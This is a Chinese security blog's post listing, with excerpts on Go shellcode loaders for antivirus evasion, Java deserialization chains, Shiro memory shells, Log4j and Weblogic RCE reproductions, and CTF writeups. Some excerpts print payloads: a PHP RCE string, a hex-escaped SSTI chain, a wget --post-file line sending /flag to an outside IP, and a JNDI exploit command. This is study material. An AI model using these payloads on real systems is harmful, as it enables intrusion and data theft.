- 博客(36)
- 收藏
- 关注
原创 基于Go加载shellcode
这里通过TideSec的go免杀项目来从0开始学习首先导个包,需要用到如下几个包。io/ioutil 文件操作os 系统操作syscall syscall包含一个指向底层操作系统原语的接口unsafe Go指针的操作非常有限,仅支持赋值和取值,不支持指针运算,可以通过unsafe包来达到效果这里定义一下变量,然后需要通过syscall来加载两个dll,和ntdll.dll。然后这里有一个检查报错的函数,如果有报错就退出并打印报错信息。
2022-10-21 15:57:45 2431 3
原创 Java反序列化——C3P0
What is C3P0?C3P0是一个开源的JDBC连接池,它实现了数据源和JNDI绑定,支持JDBC3规范和JDBC2的标准扩展。使用它的开源项目有Hibernate、Spring等。可以看到中的通过来分割和。下面来看一下这个PoolSouce类这里除了一个构造方法用来赋值以外,还有一个方法,传入了我们的恶意的和序列化的时候,如果是不可序列化的,则会抛出异常然后尝试使用 对其进行引用的封装,返回一个可以被序列化的 实例对象。这里调用的也就是的方法这里就得到了构造的,并且传给了这个可序列化的
2022-10-21 15:56:19 2878 2
原创 MTCTF Writeup By Light1ng
下载附件,是一个flask框架,然后很明显的存在pickle反序列化,首先我们需要伪造session成为admin。爆破得到key为6284,现在就可以通过来伪造session。目前就成功伪造了session。接下来看看后面的反序列化逻辑。从session中获取ser_data键的值,然后替换掉一些字符,然后过滤R i o b,就没法用pker来生成payload了,这里直接手搓opcode了,然后现在只需要把这个base64编码一下,然后作为ser_data的值,写入session即可。
2022-10-21 15:55:18 847
原创 Shiro注入内存马
前段时间学习了在Shell中如何注入Filter型内存马,搞忘了写博客了,这里重新来记录一下过程。这里直接选择用CB链来打,CB链忘记了可以看前面的文章:https://www.le1a.com/posts/a5f4a9e3/
2022-10-21 15:53:45 2081
原创 Shiro无依赖链—Commons Beanutils
Shiro无依赖链—Commons Beanutils文章首发自: https://www.le1a.com/posts/a5f4a9e3/前言前面学习了CC6在Shiro当中的应用,但是很多场景没有使用CC依赖,那么还有其他利用方式吗?那就是Commons Beanutils!Commons Beanutils是什么?Commons-Beanutils是Apache提供的一个用于操作JAVA bean的工具包。里面提供了各种各样的工具类,让我们可以很方便的对bean对象的属性进行各种操作。Ja
2022-03-23 15:02:48 7406
原创 Commons-Collections3
Commons-Collections3文章首发自: https://www.le1a.com/posts/fb41fa9a/前言CC1和CC6都是用Runtime.exec()命令调用来执行命令。CC3、CC2、CC4这几个都是用的动态类加载来执行代码,动态类加载可以看之前发的文章: Java动态类加载漏洞分析使用动态类加载来执行代码,就需要用到defineClass类来处理字节码,将其处理为真正的Java类。但由于ClassLoader类里的defineClass都是protected属性,
2022-03-23 15:01:44 645 3
原创 TemplatesImpl在Shiro中的利用
TemplatesImpl在Shiro中的利用文章首发自: https://www.le1a.com/posts/6e876d26/前言前面学习了CC1、CC3和CC6,其中CC6是不限制版本的一条链,那么为什么还要用到TemplatesImpl这条链呢?不妨我们设想一下:命令执行和代码执行到底谁更有价值?例如在PHP中会遇到一个场景,call_user_func和eval都能造成的代码执行,而更多的人愿意使用eval,原因是call_user_func在某种情况下会被限制不能使用assert和sy
2022-03-23 15:00:23 3164
原创 Java动态类加载
Java动态类加载文章首发自: https://www.le1a.com/posts/9d41d3f8/前言前面学习了反序列化,正准备趁热打铁去学cc3了,但是发现cc3需要用到动态类加载,就先来学一下。利用URLClassLoader加载远程class文件首先了解下什么是ClassLoader?ClassLoader是一个"加载器",它会让Java虚拟机知道如何加载这个类。默认的ClassLoader是根据类名来加载类的,这个类名必须是类的完整路径(跟反射有点类似),例如java.lang.R
2022-03-23 14:59:23 5899
原创 Java动态代理
Java动态代理文章首发自: https://www.le1a.com/posts/9d41d3f8/案例模拟企业业务功能开发,并完成每个功能的性能统计需求:模拟某企业用户管理业务,需包含用户登录,用户删除,用户查询功能,并要统计每个功能的耗时。分析:定义一个UserService表示用户业务接口,规定必须完成用户登录,用户删除,用户查询功能。定义一个实现类UserServiceImpl实现UserService,并完成相关功能,且统计每个功能的耗时。定义测试类,创建实验类对象,调用
2022-03-23 14:57:02 2154
原创 Weblogic Rce CVE-2017-10271复现
Weblogic Rce CVE-2017-10271复现一、环境搭建使用vulhub来搭建,进入/weblogic/CVE-2017-10271文件夹,修改其中的docker-compose.yml文件,将8453端口打开使用docker-compose命令docker-compose up -d编译镜像并启动容器使用docker exec -it b3 /bin/bash命令进入容器内,自带的vi用得很不习惯,所以进去使用apt-get install nano命令安装一下nano然后使用
2022-01-27 18:59:56 1844
原创 长安“战疫“网络安全赛Writeup
WebRCE_No_Para无参RCE?1=system('tac flag.php');&code=eval(current(current(get_defined_vars())));flaskadmin?static.js?然后发现传参点:?name=简单试了下SSTI,发现过滤了引号等符号考虑attr结合16进制来绕过{{a|attr(%27\x5f\x5f\x63\x6c\x61\x73\x73\x5f\x5f%27)|attr(%27\x5f\x5f\x62\x6
2022-01-12 21:53:11 3961
原创 Log4j2_RCE漏洞复现
log4j2_RCE漏洞复现这里是用了两种工具来复现漏洞JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar方法靶机地址:http://vulfocus.fofa.so/工具地址:https://www.lanzoup.com/i8Aa4xo5gmf密码:Le1a访问靶机地址先把 工具上传到VPS上,然后运行java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,(b
2021-12-16 18:09:33 2078
原创 2021年第四届“安洵杯”网络安全挑战赛Writeup
Misc应该算是签到B站搜索直接搜索这个BV号PS:出题人品味不错,我也喜欢酷玩的这首《Yellow》直接页面Ctrl+F没找出来搜索引擎找一下有没有通过API查弹幕的方法:https://www.bilibili.com/read/cv7923601F12点击Network,找到这个视频的cid从当前时间2021-11-27开始往前找https://api.bilibili.com/x/v2/dm/web/history/seg.so?type=1&oid=40043856
2021-11-28 14:48:20 9364 5
原创 [红明谷CTF 2021]write_shell
2021[ 红明谷CTF] write_shell[红明谷CTF 2021]write_shell进入题目,就给了源码,审计一下<?phperror_reporting(0);highlight_file(__FILE__);function check($input){ if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){ // if(preg_match("/'| |_|=|php/",$inpu
2021-11-22 19:23:30 5883
原创 2021“西湖论剑“网络安全大赛Writeup
2021"西湖论剑"网络安全大赛Writeup我只写了自己做的部分,完整WP请访问下载:https://wwe.lanzoui.com/i2XlFwqd4gb密码:Le1aWeb详见fmyyy师傅:https://blog.csdn.net/fmyyy1/article/details/121451279?spm=1001.2014.3001.5501Misc真·签到扫码关注公众号,发送语音即可flag:DASCTF{welc0m3_t0_9C51s_2021}YUSA的小秘密
2021-11-21 13:46:30 9478 1
原创 2021年“深育杯“网络安全大赛Writeup
Misc签到题下载附件得到一张二维码扫码关注,后台回复签到即可获得flagflag:SangFor{AaKjtQr_OjJpdA3QwBV_ndsKdn3vPgc_}Login下载附件example.zip,打开是password.zip但是需要密码,尝试爆破此时发现了异常,打开明明只有一个password.zip文件,这里却检测到了两个加密文件,于是我们将压缩包用010 Editor打开分析一下发现有伪加密,将此处以及后面一处的09改为00,保存之后再打开压缩包发现多了两个
2021-11-15 08:48:15 1596 3
原创 陇原战“疫“2021网络安全大赛Writeup
WebCheckIN源代码的这两处:先尝试访问/wget:/wget?argv=a,看出来这里应该是可以进行攻击的了接着尝试利用wget的--post-file进行数据外带,读取源代码在自己VPS开个监听并且构造:/wget?argv=a&argv=--post-file&argv=/flag&argv=http://1.14.92.24:8008/拿到flag:flag{6e6f4abf-f38c-4d30-8ccd-e0bc0012a13f}Misc
2021-11-08 14:35:24 6243 6
原创 2021年全国大学生网络安全邀请赛暨第七届“东华杯“上海市大学生网络安全大赛Writeup
2021年全国大学生网络安全邀请赛暨第七届"东华杯"上海市大学网格全大赛WriteupMisccheckin题目给了+AGYAbABhAGcAewBkAGgAYgBfADcAdABoAH0- 是UTF-7编码,解码得到flagflag为:flag{dhb_7th}project下载附件,解压之后发现这是道工控题目,但是解压之后里面有一个压缩包problem_bak.zip解压得到你来了~这里面一共有三段数据,第一段是base64编码6KGo5oOF5YyF5paH5YyW77y
2021-11-01 08:33:09 9830 7
原创 2021年“绿盟杯”重庆市大学生信息安全竞赛—Light1ng战队Writeup
2021年“绿盟杯”重庆市大学生信息安全竞赛—Light1ng战队Writeup其余方向Writeup详见pdf:https://wws.lanzoui.com/iWk1ovo0eaj密码:Le1aMiscMisc1:签到1题目给了一串base64编码解码得到flag:flag{c54ce9d7b4e17980dd4906d9941ed52a}Misc2:DECODER下载附件,打开得到3个txt,应该对应着三个部分的flagflag_1.txt: 042f38b694base
2021-10-23 16:22:10 2930 2
原创 2021年绿城杯Light1ng战队Writeup
Light1ng战队一、战队信息名称:Light1ng排名:16二、解题情况进不去平台了,没法截图了三、解题过程Web1.ezphpezphp在关于里看到个Git,所以考虑存在git泄露index.php里的php代码<?phpif (isset($_GET['link_page'])) { $link_page = $_GET['link_page'];} else { $link_page = "home";}$page_file = "pages/"
2021-09-30 09:20:57 3241
原创 DASCTF Sept X 浙江工业大学秋季挑战赛 Misc Girlfriend‘s account
Girlfriend’s account下载附件,得到一个excel表格,打开得到flag{账单总金额四舍五入保留至小数点后两位},例如总金额为 543.21 元时,你需要提交 flag{543.21}也就是说这个excel是个账单,不仅有商品单价,还有购买商品的数量,flag就是计算账单的总额,也就是算他女朋友花了多少钱,然后保留两位小数。excel有函数可以计算乘法跟求和,但是这里并不是阿拉伯数字,所以我们接下来要做的就是把这个人民币的中文大写数字给转为阿拉伯数字 。百度上查阅一下百度知道链
2021-09-26 20:14:28 349 2
原创 记一次某理工大学getshell(证书站)
刚放假,闲的没事,就想着一边用Xray+rad配合红队师傅写的py脚本来批量挖掘edu漏洞py脚本地址:点击进入Xray地址:点击进入rad地址:点击进入使用详情请见 https://github.com/timwhitez/rad-xray连续扫了几天也没啥收获,最后去看了一下漏洞报告,发现了某理工大学旁站的一个备份文件访问 https://xxxx/backup.zip 下载备份文件意外在wp-config.php中发现了数据库配置信息,其中包含了数据库账号和密码并且发现了备份了数
2021-07-09 15:36:32 626
原创 0CTF/TCTF 2021 Quals_Misc_singer
Miscsinger下载附件打开得到一个文本文件从Csome-Official师傅的文章中得知,其文本内容除了=和,外,其他的是简谱音名没写完 明天写
2021-07-07 00:33:20 376
原创 GKCTF2021 ✖ DASCTF应急挑战杯 部分WP
Misc你知道apng吗下载附件得到girl.apng,用apngdis_gui分解得到每一帧的png图片分别在2,18,26发现二维码。其中18,26可以直接扫描得到-ad20和-0327-288a235370ea}。图片2是扭曲的二维码,但可以用ps拖正扫描得到flag{a3c7e4e5,最后在第十张图片的红色通道1中得到二维码扫描得到-9b9d,所以flag为 flag{a3c7e4e5-9b9d-ad20-0327-288a235370ea}银杏岛の奇妙冒险下载附件,打开exe,
2021-06-27 14:05:27 1087
原创 Bugku_Misc_答案
下载附件得到你明白吗?,用foremost分离得到一张图片和一个加密压缩包查看图片属性得到佛语论禅加密(点此进入解码网站)解码得到压缩包的密码为美乐蒂卡哇伊,打开压缩包得到password.txt和加密的压缩包答案.zip打开password.txt得到两列数字,在最下方提示了青花这首歌这两列数字猜测应该对应着歌词,前面的数字代表是多少行,后面的数字代表是第几个全部对照转换完得到密码三匆爱温蒙惚心信承失记愈的逢过濡善着记回寞神梦,打开密码.zip得到一张图片用010 Editor打开
2021-06-12 22:59:54 447 4
原创 DASCTF_Misc_holmes
下载附件得到一张福尔摩斯的图片上面有跳舞小人加密,通过对照表解密得到YOUAREHOLMES用Foremost分离得到一个压缩包,用刚刚得到的YOUAREHOLMES作为密码解压得到一个python文件,打开得到一个程序flag="flag{********************************}"encflag=[]for i in range(len(flag)): encflag.append((ord(flag[i])+i)%128)print(encflag)'
2021-05-29 20:39:50 337
原创 Bugku_Misc_where is flag 2
下载打开附件压缩包,里面15个txt文件,以及一个图片我一直在尝试打开这个压缩包,也试过爆破,发现不行,压缩包用010打开也没有什么发现。既然常规思路不行,那就换个思路,像上题一样,文件内容没啥用,这题我们注意观察文件名,发现是十六进制,利用文件的CRC32转换ascii码(图片的CRC32不用)十五个文件的CRC32连起来,进入用十六进制转ascii,就得到了flag得到flag为 bugku{You_can't_imagine_the_happiness_of_hiding_the_flag!!
2021-05-20 20:14:39 968
原创 Bugku_Misc_where is flag
下载附件得到10个txt文件,用010打开发现里面全是00截断符号这时候唯一的线索就是字节大小,用py脚本把每个文件的字节长度跑出来for n in range(1,11): name = str(n)+'.txt' with open(name) as f: print(len(f.read()),end="")跑出来的字节长度应该是十进制的ascii码,尝试对它进行分割,然后跑出来得到 bugku{na0d0ngdaka1}for n in range(1,
2021-05-20 10:34:45 1054
原创 Bugku_Misc_Photo的自我修养
附件下载密码:Le1a下载附件得到一个压缩包,压缩包里面是个文件夹,文件夹内有一个图片和两个加密的压缩包,先看看这个图片能隐约发现右下角有信息藏着的,修改图片高度得到图片右下角的信息:B:One2021@尝试打开001.zip发现文件头报错于是用010Editor打开010.zip发现前面几个压缩包的标志头第5 6位都是00 00,最后一个压缩包标志头是00 14,于是将前面几个都改为00 14修改完之后保存,打开得到一张图片丢入010Editor,发现一截可疑字符串A:Just跟
2021-05-17 21:01:26 316
原创 Bugku_Misc_Licking dog diary
附件下载密码:Le1a下载附件得到一个加密压缩包xka.rar和一个图片my_baby.png(话说这不是mumuzi的头像吗图片用StegSolve打开发现LSB隐写!点击Save Bin另存为一个新的文件文件中发现了elf文件数据将elf文件头前面的部分全部删掉,然后保存(注意elf前的空格不能删)尝试直接运行,结果报错,winhex继续分析,发现末尾有一段文字要删掉丢入kali里面,再次运行得到一串箭头↕↱↕↕↔↙↕↙↔↓↕→↕→↔↗↔↘↕↺↕↲↔↗↔↕↔↗↔↕↔↗↔↕=用
2021-05-16 20:58:35 386 3
原创 Bugku_Misc_论剑
下载附件密码:Le1a下载附件打开得到一张图片用Winhex打开发现一串二进制数据将二进制转为ascii码得到一串文本mynameiskey!!!hhh用foremost分离图片得到两张新的图片,得到的两张图片看似相同,但高度有些微差距,那么将两张图片的高度都改变后,在其中一张图片中发现信息(jpg图片的高在FFC2的3字节后,将高0042改为03OD)有字母被遮挡了,继续查看原图片,在刚刚的二进制后面,还有一串十六进制码38 7B BC AF和7z文件的文件头37 7A BC AF
2021-05-15 16:05:06 163
原创 Bugku_Misc_baby_flag.txt
附件下载密码:Le1a下载附件得到一个压缩包baby_flag.zip打开得到baby_flag.txt,打开观察发现这是一个图片文件将文件后缀改为.jpeg得到一张图片用Winhex打开图片发现有RAR压缩包的头将这一部分数据复制下来另存为一个后缀为.rar的文件但是发现压缩包打不开…发现其文件头存在问题,Rar的文件头一般是52617221,这里刚好把52和72换了个位置,修改好后,得到一个正确的rar文件,打开后发现存在加密根据题目提示hint:还能再高亿点点应该是去修
2021-05-13 19:52:37 619
原创 Bugku_Misc_一切有为法如梦幻泡影
附件下载密码:Le1a下载附件得到一个压缩包,解压得到Zero.png以及《察》.zip用foremost分离图片得到一个压缩包,打开压缩包得到问.png将问.png 在010Editor分析一下,一切正常,考虑怎样解开《察》.zip既然没有提示,暴力破解试一下得到密码为42,解压得《探》.zip和one.png,将one.png用foremost分离得到一个压缩包,打开得到感.png用010分析感.png发现一切正常,暴力破解《探》.zip和伪加密也不行,尝试用Stegsolve分析
2021-05-13 13:23:49 509 1
原创 Bugku_Misc_悲伤的故事
附件下载密码:Le1a下载附件得到一个压缩包,解压得到你有看过这个电影吗和一个悲伤的故事.zip记事本打开你有看过这个电影吗发现文件时.webp后缀的图片将后缀改为.webp得到一张电影的图片,看着十分熟悉,但又实在想不起来是什么电影了 ????(吐血倒地) ,还好有百度拍照搜索得知电影名叫比悲伤更悲伤的故事接着用WINRAR打开另一个压缩包,这是个加密的压缩包,在注释这里发现提示信息显然这九个汉字就是比悲伤更悲伤的故事打开压缩包得到一个新的压缩包2158646223.rar同样用WI
2021-05-12 19:28:23 496
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人